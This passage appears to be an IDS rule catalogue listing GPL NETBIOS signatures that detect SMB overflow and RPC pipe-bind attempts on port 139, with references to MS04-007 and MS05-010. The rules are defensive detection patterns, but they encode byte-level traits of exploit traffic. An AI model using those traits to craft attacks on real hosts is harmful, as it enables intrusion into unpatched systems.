alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Session Setup NTMLSSP andx asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"s"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_test:4,&,2147483648,21,relative,little; content:!"NTLMSSP"; within:7; distance:27; asn1:double_overflow, bitstring_overflow, relative_offset 27, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2103001; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Session Setup NTMLSSP andx asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103002

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB Session Setup NTMLSSP unicode andx asn1 overflow attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"s"; depth:1; offset:39; byte_jump:2,0,little,relative; byte_test:4,&,2147483648,21,relative,little; content:!"NTLMSSP"; within:7; distance:27; asn1:double_overflow, bitstring_overflow, relative_offset 27, oversize_length 2048; reference:bugtraq,9633; reference:bugtraq,9635; reference:cve,2003-0818; reference:nessus,12052; reference:nessus,12065; reference:url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx; classtype:protocol-command-decode; sid:2103002; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB Session Setup NTMLSSP unicode andx asn1 overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : bugtraq,9633|bugtraq,9635|cve,2003-0818|nessus,12052|nessus,12065|url,www.microsoft.com/technet/security/bulletin/MS04-007.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103244

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103244; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB irot andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103245

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103245; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB irot little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103246

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103246; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB irot unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103247

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB irot unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"`|9E E7 B9|R=|CE 11 AA A1 00 00|i|01 29|?"; within:16; distance:29; flowbits:set,smb.tree.bind.irot; flowbits:noalert; classtype:protocol-command-decode; sid:2103247; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB irot unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103118

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103118; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103119

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,52,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103119; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103120

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect unicode andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103120; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect unicode andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103121

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrconnect unicode little endian andx overflow attempt"; flow:established,to_server; flowbits:isset,smb.tree.bind.llsrpc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|00|"; within:1; distance:1; content:"|00 00|"; within:2; distance:19; byte_test:4,>,104,0,relative; reference:url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx; classtype:attempted-admin; sid:2103121; rev:5; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrconnect unicode little endian andx overflow attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : attempted-admin

URL reference : url,www.microsoft.com/technet/security/bulletin/ms05-010.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 5

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103102

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103102; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103092

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C|llsrpc|00|"; within:8; distance:51; nocase; classtype:protocol-command-decode; sid:2103092; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103103

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103103; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103104

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103104; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103093

#alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc unicode andx create tree attempt"; flow:established,to_server; flowbits:isset,smb.tree.connect.ipc; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"|A2|"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"|5C 00|l|00|l|00|s|00|r|00|p|00|c|00 00 00|"; within:16; distance:51; nocase; classtype:protocol-command-decode; sid:2103093; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc unicode andx create tree attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103105

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB llsrpc unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"@|FD|,4l<|CE 11 A8 93 08 00|+.|9C|m"; within:16; distance:29; flowbits:set,smb.tree.bind.llsrpc; classtype:protocol-command-decode; sid:2103105; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB llsrpc unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103164

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103164; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103165

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103165; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103166

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue unicode andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103166; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue unicode andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103167

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB msqueue unicode little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C 00|P|00|I|00|P|00|E|00 5C 00 00 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; content:"|05|"; distance:4; within:1; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|B0 01|R|97 CA|Y|D0 11 A8 D5 00 A0 C9 0D 80|Q"; within:16; distance:29; flowbits:set,smb.tree.bind.msqueue; flowbits:noalert; reference:cve,2003-0995; reference:url,www.eeye.com/html/Research/Advisories/AD20030910.html; reference:url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx; classtype:protocol-command-decode; sid:2103167; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB msqueue unicode little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : cve,2003-0995|url,www.eeye.com/html/Research/Advisories/AD20030910.html|url,www.microsoft.com/technet/security/bulletin/MS03-026.mspx

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103206

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,!&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103206; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103207

alert tcp $EXTERNAL_NET any -> $HOME_NET 139 (msg:"GPL NETBIOS SMB winreg little endian andx bind attempt"; flow:established,to_server; content:"|00|"; depth:1; content:"|FF|SMB"; within:4; distance:3; pcre:"/^(\x75|\x2d|\x2f|\x73|\xa2|\x2e|\x24|\x74)/sR"; byte_test:1,!&,128,6,relative; content:"%"; depth:1; offset:39; byte_jump:2,0,little,relative; content:"&|00|"; within:2; distance:29; content:"|5C|PIPE|5C 00|"; distance:4; nocase; byte_jump:2,-17,relative,from_beginning,little; isdataat:4,relative; content:"|05|"; byte_test:1,&,16,3,relative; content:"|0B|"; within:1; distance:1; content:"|01 D0 8C|3D|22 F1|1|AA AA 90 00|8|00 10 03|"; within:16; distance:29; flowbits:set,smb.tree.bind.winreg; flowbits:noalert; classtype:protocol-command-decode; sid:2103207; rev:4; metadata:created_at 2010_09_23, updated_at 2010_09_23;)

Name : SMB winreg little endian andx bind attempt

Attack target : Not defined

Description : Not defined

Tags : Not defined

Affected products : Not defined

Alert Classtype : protocol-command-decode

URL reference : Not defined

CVE reference : Not defined

Creation date : 2010-09-23

Last modified date : 2010-09-23

Rev version : 4

Category : NETBIOS

Severity : Not defined

Ruleset : GPL

Malware Family : Not defined

Type : SID

Performance Impact : Not defined

2103208

